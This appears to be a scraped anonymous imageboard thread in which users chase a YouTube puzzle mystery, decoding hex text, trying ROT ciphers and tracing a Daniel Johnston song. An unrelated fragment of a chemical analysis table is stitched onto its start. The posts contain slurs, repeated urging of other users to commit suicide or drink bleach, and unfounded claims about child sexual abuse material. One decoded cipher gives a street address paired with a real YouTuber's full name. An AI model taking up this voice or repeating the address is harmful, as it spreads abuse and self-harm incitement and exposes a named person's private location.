19 T Nitrobenzene 0.388 0.390 -0.5 94 -0.02
20 T Isophorone 0.791 0.798 -0.9 93 -0.03
21 C 2-Nitrophenol 0.227 0.259 -14.1 103 -0.02
22 T 2,4-Dimethyiphenol 0.273 0.301 -10.3 103 -0.02
23 T bis(2-Chloroethoxy)methane 0.482 0.494 -2.5 95 -0.03
24 T Benzoic acid 0.220 0.251 -14.1 102 -0.11
25 C 2,4-Dichlorophenol 0.262 0.278 -6.1 98 -0.02
26 M 1,2,4-Trichlorobenzene 0.250 0.270 -8.0 99 -0.01
27 T Naphthalene 0.898 1.054 -17.4 108 -0.03
28 T 4-Chioroaniline 0.372 0.402 -8.1 99 -0.03

THEY DELETED THE CP THANK GOD

OP SHOULD UPLOAD MORE VIDEOS THEN COMMIT SUICIDE IMMINENTLY

I'm confused, how does a bunch of hexadecimal text produce cheese pizza? Are they links?

>>685349063
welcome to the matrix

Hopefully, he'll get permabanned and death row. And cancer. Sick fuck.

>>685333942
WHY CHAPTER 12?

File: calm.jpg (106 KB, 640x480) Image search: [Google]

106 KB, 640x480

>>685348905
Do you have any fucking proof that it's cp?? Fucking translate it yourself also kys
>>685348767
>>685348717

>>685349189
REFRESH THE PAGE

HOW CAN U TRANSLATE WHAT DOESNT EXIST ANYMORE!!

File: 1463706551964.gif (393 KB, 640x360) Image search: [Google]

393 KB, 640x360

>>685349189
Did you do any of the other coding he posted? Lurk more you fucking idiot. It's tightly encoded.

File: Daniel_Johnston-Hi_How_Are_You.jpg (26 KB, 220x340) Image search: [Google]

26 KB, 220x340

It seems like the song in the video is called "Poor You", maybe that has significance?

>>685349322
I have it copy-pasted. OP is dead.

>>685333942
They followed around stalking "bshlk"

>>685349324
I did. I looked through it all. Hell, I even posted a screenshot.

>>685348974
The hell is this chemical formula shit?

File: IMTHINKING.jpg (151 KB, 500x442) Image search: [Google]

151 KB, 500x442

>>685348974

>>685349472
its a murder, they where following someone to kill em?

>>685349489
So you're OP decoying? Fucking faggot. He was posting a bunch of coding that everyone saved, and then this. If you add it to the rest of that you get CP. You just translated it and got the Navy Seals copypasta.

File: 1463707602162.jpg (27 KB, 460x368) Image search: [Google]

27 KB, 460x368

>>685349489

File: 1454464365755.jpg (61 KB, 720x543) Image search: [Google]

61 KB, 720x543

>>685333942
>>685336056
>>685336584
>>685337637
>>685338719
>>685338887
>>685338896
>>685339046
>>685339139
>>685339217
>>685339453
>>685339837
>>685339945
>>685340255
>>685340259
>>685340548
>>685340642
>>685341065
>>685341523
>>685341525
>>685341621
>>685341731
>>685341828
>>685342096
>>685342342
>>685342365
>>685342478
>>685342591
>>685342754
>>685343242
>>685343302
>>685343411
>>685343480
>>685343644
>>685343771
>>685343836
>>685343836 >>685344038 >>685344218 >>685344267 >>685344324 >>685344450 >>685344457
>>685344667 >>685344686 >>685344859
>>685344994 >>685345061 >>685345178 >>685345216 >>685345122 >>685345636 >>685345701 >>685346083 >>685346118 >>685346286

what does word snut mean?

>>685350043
go away spidy!

>>685350043
FUCK OFF, THIS IS SERIOUS YOU PIECE OF SHIT.

WTF how tf is it cp?

>>685349974
it means https://www.youtube.com/watch?v=AVbQo3IOC_A

>>685349322
>1434673642463.gif
I mean I can post the screenshots I took

>>685350726
DO IT SONNY

File: 1461100286210.jpg (61 KB, 500x368) Image search: [Google]

61 KB, 500x368

>>685350726
>>685350780

File: jojo disgust.jpg (47 KB, 209x406) Image search: [Google]

47 KB, 209x406

>>685351168
you can leave now

Anything on the videos? Seemed like generic ARG spoopy garbage to me

File: 5074712+_55a234061e9a70665207c1fb9763fa71.jpg (14 KB, 300x179) Image search: [Google]

14 KB, 300x179

>>685351345

File: 1461097664028.jpg (38 KB, 480x360) Image search: [Google]

38 KB, 480x360

>>685351345
>>685351545

File: A7.png (80 KB, 1589x635) Image search: [Google]

80 KB, 1589x635

>>685350726
Here ya go bitch

This thread is dead


Just like your memes


and your waifu

File: raining snacks.gif (2 MB, 310x325) Image search: [Google]

2 MB, 310x325

>>685351545
all i can see is that the most recent video was quoting lyrics from daniel johnston's "poor you"
>>685351710
i don't feel like typing all that out

>>685351710
at least 3 of those comments are me
not even lying

The song of the new vid id Daniel Johnson Poor you

File: 1461097263823.jpg (47 KB, 600x400) Image search: [Google]

47 KB, 600x400

>>685352300
>>685352538
>>685352544

File: 62b0495b8c1f710c1a75bc67bd1b3970.gif (1 MB, 252x150) Image search: [Google]

1 MB, 252x150

>>685336056

>>685352300
what do you think the title means?

>>685352544
>They followed around stalking Daniel Johnson

File: 1450612229389.gif (194 KB, 267x186) Image search: [Google]

194 KB, 267x186

>>685352764
>>685352785
>>685352814

Another video posted 003
https://www.youtube.com/watch?v=PHcOs9058nA

File: 1461098781401.jpg (16 KB, 307x227) Image search: [Google]

16 KB, 307x227

>>685353009
>>685352814
>>685352785
>>685352544
>>685352538
>>685352300

>>685337282
a r o u n d
They followed (from latin: secuti sunt)
stalk (from latin culmus)
here
bshlk (still don't know what this should be)

>>685353252
>>685337282

>They followed around stalking Daniel Johnson

>>685353192
I'm sorry you don't find this thrilling/entertaining. There are still other places on the internet one can go to maybe find something that will entertain you.

>>685353252
from ROT13, bshlk is ofuyx, if that makes any more sense

>>685353537
Lol no, tried all 26 ROT but didn't find anything less garbled. Tried some of the lesser garbled ones to see if they were latin. WStill no luck

File: 1273646004844.jpg (18 KB, 386x384) Image search: [Google]

18 KB, 386x384

>>685353418

File: 1397057716494.jpg (34 KB, 400x293) Image search: [Google]

34 KB, 400x293

>>685353456

>>685353740
all the videos explains that, and the guy uploaded another video exacly when i sent that

File: 1463784044386.gif (2 MB, 530x300) Image search: [Google]

2 MB, 530x300

>>685353889
>>685353708
>>685353537
>>685353456
>>685353418
>>685353252

File: Mothers Day O.jpg (115 KB, 673x936) Image search: [Google]

115 KB, 673x936

>>685351710
OCR
57 68 61 74 20 74 68 65 20 66 75 63 6b 20 64 69 64 20 79 6f 75 20 6a 75 73 74 20 66 75 63 6b 69 6e 67 20 73 61 7920 61 626f 75 74 20 6d 65 2c 20 79 6f 75 20 6c 69 74 74 6c 65 20 6269 74 63 68 3f 20 49 6c 20 68 61 76 65 20 79 6f 75 20 6b
6e 6f77 20 49 20 67 72 61 64 75 61 74 65 64 20 74 6f 70 20 6f 66 20 6d 79 20 63 6c 61 73 73 20 69 68 20 74 68 65 20 61 76 79 20 53 65 61 6c 73 2c 20 61 6e 64 20 49 92 76 65 20 62 65 65 68 20 69 6e 76 6f 6c 76 65 64 20 69 6e 20 6e 75 6d 65 72
6f 75 73 20 73 65 63 72 65 74 20 72 61 69 64 73 20 6f 6e 20 41 6c 2d 51 75 61 65 64 61 2c 20 61 6e 64 20 49 20 68 61 76 65 20 6f 76 65 72 20 33 30 30 20 63 6f 68 66 69 72 6d 65 64 20 6b 69 6c 6c 73 28 20 49 20 61 6d 20 74 72 61 69 68 65 64 20 69
6e 20 67 6f72 69 6c 6c 61 20 77 61 72 66 61 72 65 20 61 6e 64 20 49 92 6d 20 74 68 65 20 74 6f 70 20 73 68 69 70 65 72 20 69 6e 20 74 68 65 20 65 6e 74 69 72 65 20 55 53 20 61 72 6d 65 64 20 66 6f 72 63 65 73 2e 20 59 6f 75 20 61 72 65 20 6e 6f
74 68 69 6e 67 20 74 6f 20 6d 65 20 62 75 74 20 6a 75 73 74 20 61 68 6f 74 68 65 72 20 74 61 7267 65 74 2e 20 49 20 77 69 6c 6c 20 77 69 70 65 20 79 6f 75 20 74 68 65 20 66 75 63 6b 20 6f 75 74 20 77 69 74 68 20 70 72 65 63 69 73 69 6f 6e 20 74
68 65 20 6c 69 6b 65 73 20 6f 66 20 77 68 69 63 68 20 68 61 73 20 6e 65 76 65 72 20 62 65 65 6e 20 73 65 65 6e 20 62 65 66 6f 72 65 20 6f 68 20 74 68 69 73 20 45 61 72 74 68 2c 20 6d 61 72 6b 20 6d 79 20 66 75 63 6b 69 68 67 20 77 6f 72 64 73 2e
20 59 6f 75 20 74 68 69 68 6b 20 79 6f 75 20 63 61 6e 20 67 65 74 20 61 77 61 7920 77 69 74 68 20 73 61 79 69 68 67 20 74 68 61 7420 73 68 69 74 20 74 6f 20 6d 65 20 6f 76 65 72 20 74 68 65 20 49 68 74 65 72 68 65 74 3f 20 54 68 69 68 6b 20 61
67 61 69 6e 2c 20 66 75 63 6b 65 72 20 41 73 20 77 65 20 73 70 65 61 6b 20 49 20 61 6d 20 63 6f 6e 74 61 63 74696e 67 20 6d 79 20 73 65 63 72 65 74 20 6e 65 74 77 6f 72 6b 20 6f 66 20 73 70 69 65 73 20 61 63 726f 73 73 20 74 68 65 20 55 53
41 20 61 6e64 20 796f7572

>>685353889
I'm not sure I follow. From where do you get the name Daniel Johnson?

>>685353865
Noting one could really do over an anonymous message board now...
Just wanted to let you know about the options open for you.

>>685354214
from the song he sings in the video (bshlk)

003
https://www.youtube.com/watch?v=PHcOs9058nA

File: 1397058502111.jpg (31 KB, 363x310) Image search: [Google]

31 KB, 363x310

>>685354373

>>685354421
i hear a bird singing at 0:03 or maybe a distorted audio?

>>685354214
for me i searched on google:
lyrics "some words you hear" "some other"
99% of the time you get the song

File: Meanwhile-in-Detroit_c_95110.jpg (129 KB, 500x415) Image search: [Google]

129 KB, 500x415

>>685354373
this nigga's jimmies will not be hassled

File: 1457945582026.jpg (62 KB, 450x557) Image search: [Google]

62 KB, 450x557

>>685354456
Yes

>>685354561
Seems like he's at a sea or a coast, the see is behind him and he's facing a plain field. If it was cp and he was a murderer as some said in the thread i don't want to know anymore

How did you find out it was cp? any proof? what did u decoded

>>685354064
Illegal, Mr.Spooky

File: 1398403993934.gif (2 MB, 176x144) Image search: [Google]

2 MB, 176x144

>>685354708

File: 1399059309980.jpg (11 KB, 229x144) Image search: [Google]

11 KB, 229x144

>>685354561
>>685354644
>>685354839

>>685354839
Ho and the name of the vid is here. The name fo the channel is deeper. Maybe that's dumb but if it was in fact a murderer that's where the bodies are....

>>685354644
I tried but to noo avail... what was the song he was singing?

(Tried agian but I can only hear:

Every morning he got up
ready
the clock was ticking
time was flowing
he woudnt go
sitting in a chair leaning against the wall didn't seem to matter much

File: op not faggot.png (7 KB, 277x277) Image search: [Google]

7 KB, 277x277

might actually be something

>>685355201http://genius.com/Daniel-johnston-poor-you-lyrics

>>685355201
perfect just type on google
lyrics "Every morning he got up"
https://www.google.ch/search?q=lyrics+%22Every+morning+he+got+up%22&oq=lyrics+%22Every+morning+he+got+up%22&aqs=chrome..69i57j69i59l2.3349j0j9&sourceid=chrome&ie=UTF-8

Has anyone realised that the first hex code relates to War of The Worlds by HG wells?

File: 1463700541979.jpg (56 KB, 848x480) Image search: [Google]

56 KB, 848x480

>>685355023
New banner again:
http://yt3.ggpht.com/-LCPGG6HEzq8/Vz-Ves0LXII/AAAAAAAAAF0/89a0By2_CAwE09_DBWRbVOHPpddq_QzIACL8B/w1060-fcrop64=1,00005a57ffffa5a8-nd-c0xffffffff-rj-k-no/empty.png

File: aboutthat.jpg (78 KB, 700x700) Image search: [Google]

78 KB, 700x700

>>685355344
man every un knows that the qr for goatse
gtfo

>>685355567
Veantus? Anyone see the chicken scratch?

File: 1454463919878.gif (480 KB, 493x342) Image search: [Google]

480 KB, 493x342

>>685355200
>>685355201
>>685355344
>>685355399
>>685355507
>>685355552
>>685355567

>>685355567
hunting?

you guise trying to pull some /x/ shit here?
you have to try harder to make it on youtube tho

>>685355567
penatus = homes
venatus = games

if translated correctly

>>685355829
To hunt

I really want to know what op looks like and what he must be thinking releasing these new vids, must be fun

>>685333942
Omg a bunch of numbers XDDDD That's so scary XDDDDD
Drink bleach, faggot.

>>685355949
CP means copy posta also right?

Daniel Johnson is also the name of a pirate. Maybe the field in the 5th video/the coordinates is where his treasure is buried!

We have to find it /b/! We'll be rich!

>>685355344

UXP, HSBOE BWFOVF
GMBU GPVS
IPWF
CO32MC
FBTU TVTTFY

GFMJY LKFMMCFSH

>>685354064
FUck Off bitchh don't give a shit if me posting a screenshot pisses ya off

Also, here's another screenshot, this time of the entire page just taken a few seconds ago

http://i.imgur.com/vIcetFM.jpg

[img]http://i.imgur.com/vIcetFM.jpg[/img]

>>685356142
now shift all of those letters with -1

>>685356142

TWO, GRAND AVENUE
FLAT FOUR
HOVE
BN32LB
EAST SUSSEX

FELIX KJELLBERG

File: you just activated my trap card.jpg (18 KB, 320x320) Image search: [Google]

18 KB, 320x320

>>685356456
alright this arg has lost me
that's pewdiepie's name

File: 1463775188260.jpg (101 KB, 1280x750) Image search: [Google]

101 KB, 1280x750

>>685355829
>>685355942
>>685355949
>>685355979
>>685355979
>>685356057
>>685356118
>>685356142
>>685356212
>>685356365
>>685356456
>>685356674